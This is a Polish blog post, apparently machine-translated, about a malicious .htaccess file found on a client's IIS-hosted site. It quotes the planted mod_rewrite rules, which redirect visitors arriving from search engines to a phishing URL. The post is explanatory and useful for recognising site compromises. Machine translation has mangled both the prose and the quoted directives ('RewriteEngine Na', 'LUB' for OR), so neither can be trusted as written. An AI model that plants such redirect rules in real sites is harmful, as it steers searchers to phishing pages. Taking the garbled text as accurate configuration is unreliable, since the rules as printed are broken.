Czwartek, 22 stycznia, 2009 | Autor:

Ja niedawno znalazłem problemu z strony internetowej klienta w związku z .htaccess plik. Strona została umieszczona na Okna Serwer pracuje IIS za pomocą IISPassword, co czyni wykorzystanie .htaccess Pliki do swoich ustawień.

IISPassword nie wynika dokładnie takie same zasady jak przy Apache jednak. Jeśli plik nie istnieje, to .htaccess musi zawierają IISPassword-odpowiednie przepisy, inaczej serwer zwraca tylko następujący błąd:

Error 500 given by IIS Password
Oto zawartość pliku htaccess. I już tylko ostatecznej modyfikacji przekierowania URL do odpowiednio do example.com:

RewriteEngine Na
RewriteCond %{HTTP_REFERER} .*google. * $ [NC,LUB]
RewriteCond %{HTTP_REFERER} .*AOL. * $ [NC,LUB]
RewriteCond %{HTTP_REFERER} .*MSN. * $ [NC,LUB]
RewriteCond %{HTTP_REFERER} .*yahoo. * $ [NC,LUB]
RewriteCond %{HTTP_REFERER} .*Yandex. * $ [NC,LUB]
RewriteCond %{HTTP_REFERER} .*rambler. * $ [NC,LUB]
RewriteCond %{HTTP_REFERER} .*. * $ [NC]
RewriteRule .* http://siffy-phishing-url.example.com [R,L]

Jeśli to były na serwerze Apache mod_rewrite, większość użytkowników Internetu pójdzie bezpośrednio do właściwej treści strony. Tylko wtedy, gdy dotarli do witryny przez wyszukiwarki i indeksów notowanych na .htaccess, zostaną one przekierowane do siffy url phishingu, że dziadek chce ofiary, aby osiągnąć.

Oczywiście, krakingu (lub nawet zautomatyzowane ślimakowe) nie zdawali sobie sprawy, że serwer w kwestii nawet nie obsługuje tych zasad mod_rewrite. Ale tak czy inaczej, to jest bardzo niepokojące, jak można przewidywać wiele argumentów na temat tego, czy strona jest pracy

Dzielić
Kategoria: hosting, przypadkowy
Możesz śledzić odpowiedzi do tego wpisu poprzez RSS 2.0 karmić. Można zostawić odpowiedź, lub trackback ze swojej strony.
Dodaj komentarz » Zaloguj się